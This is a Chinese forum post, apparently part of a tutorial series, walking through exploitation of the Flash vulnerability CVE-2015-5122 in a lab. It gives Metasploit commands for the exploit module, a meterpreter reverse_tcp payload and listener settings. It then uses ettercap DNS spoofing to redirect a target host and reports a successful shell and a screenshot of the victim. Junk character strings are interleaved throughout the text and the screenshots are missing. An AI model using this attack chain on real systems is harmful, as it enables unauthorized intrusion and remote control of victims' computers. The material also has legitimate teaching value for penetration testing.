M# X* Q0 _( U {0 c2 \& ]$ \( v% Z 二、cve2015-5122漏洞实例演示虚拟机 4 ]" G1 T( ^/ g4 Z
: r6 `0 P# k7 j4 N3 v! I, m) ]
5 z9 ~! @0 o2 k$ k' v4 c 关于cve2015-5122这个漏洞,大家可以百度一下,是关于flash的漏洞,是2015年flash漏洞的第二发,今天我们就用这个漏洞来演示,开启kai linux msfconsole命令启动msf如图: ! u' @* g# D3 L
& U$ R+ r% S. [1 |+ x& P9 U( Q/ w7 C/ A: x7 N0 e% n
search cve-2015-5122如图: # E+ U4 O2 }& E; h0 T
4 c) I9 b' m/ @% i
5 @4 `$ [; @" o5 ^
! V) y, O' f4 I. J) D* G
+ c f5 L1 {2 p* d( g! g0 u. w3 x- j6 T! z6 P; w3 b. T
下面我们敲如下命令: ) V# D/ O7 Y! R: o3 u# t% n
+ H1 d p5 p8 [1 _! T
. b9 t' `: Q: A9 X8 Z1 F
use exploit/multi/browser/adobe_flash_opaque_background_uaf
* Y* F2 H. O1 m6 W# H7 q
& E* E2 J' u+ t. O, f6 I$ |7 e0 b4 r- y `1 q* z
set PAYLOAD windows/meterpreter/reverse_tcp - i9 ?# m& ~2 X! Y
4 @% s1 s8 c9 a% s% O& ~9 z5 x* {: o: p* b! v0 O0 y0 r
set LHOST 192.168.0.109 4 D) q% g6 I- o$ {9 E
2 A: T$ q- h. u
3 P& z$ k4 o/ { }8 O: U/ C
set URIPATH / /*根目录*/ * d6 C' O) C K8 q, m3 a0 {0 b$ N
& E, }1 S& d3 n/ I# v
' u8 r1 q; @% g0 u4 b- W set SRVHOST 192.168.0.109 //192.168.0.109为kaili ip地址 * N1 G3 Y" l& i7 A5 F$ C2 y, q" t
4 N+ G f/ M! U+ r2 q/ ^3 M# ?% a
0 A0 S/ F) ?8 K$ e% |! I set SRVPORT 80 /*80端口*/ 使用80端口时要保证apache为停止状态用service apache2 stop命令停止否则会提示端口被占用
' j1 D4 B3 [$ T( M/ }
, y% T5 u, o3 L4 v: G7 [
4 a3 [2 H. |; W- ]3 H( G 然后show options如图: ( z7 u: i* v3 t; B
* e5 j; r( Y- f& ]# L: l
$ \! D$ Y& h, Q
- H( X! V( z f4 f" A( J . w" U/ I% Y, Y+ n( x: X3 e
4 b* n7 w. S7 B6 D" U& b 一切都设置好了,执行exploit。下面我们进etc/ettercap目录下设置etc.dns如图:
( q* [: v2 n4 O1 Q) l9 [( x $ J6 W* [3 D# n' C
5 Z+ g1 V5 v! Y! W: O* _+ s& [1 d9 f+ W$ i4 Q
然后ettercap -G命令打开ettercap,我们要攻击的主机ip是192.168.0。115 5 a$ O5 y1 c( d" [
: v4 Y9 ~4 W+ Q t: d; ~3 L2 l1 p; X
5 _0 J- Z4 u# ^7 ]
Ettercap过程第一篇里已经演示,这里不在详细写了。。。执行完ettercap以后我们观察一下msf
/ k( C d: t1 v5 Z2 p, e 7 z4 w; i1 z5 O2 I2 z( G
. x" O; g6 s4 G% [* F/ R" @' T
) Q0 r/ [- Y4 ~4 j/ O3 Y1 X# y, w9 X: Z
& `+ q9 \; R2 I1 b% \) Y# o
. T2 R/ v0 V1 O- ]5 o2 [2 p: w 成功了,这时候我们断开ettercap,如图:
* V& |) @1 n3 @" u# g $ b' u0 l3 g$ R$ D7 E9 j
, v+ ^( H3 R" D# T / s# C9 F( W3 g' Q
" ^3 I# {! s* l2 ? b) p
) ?4 r+ P/ `9 C/ g Screenshot如图:
* K9 k/ B5 V, e4 Q% m& ~7 f G9 t+ t! \4 c, x& \; P
, u3 J: i9 ^, j4 t
& K" k3 i) t8 X) c
8 i! P# y0 X. ?8 X1 ~/ ~
% I7 ^9 J& V( B& J3 S1 K
6 m7 a& w' w# R. B' L h |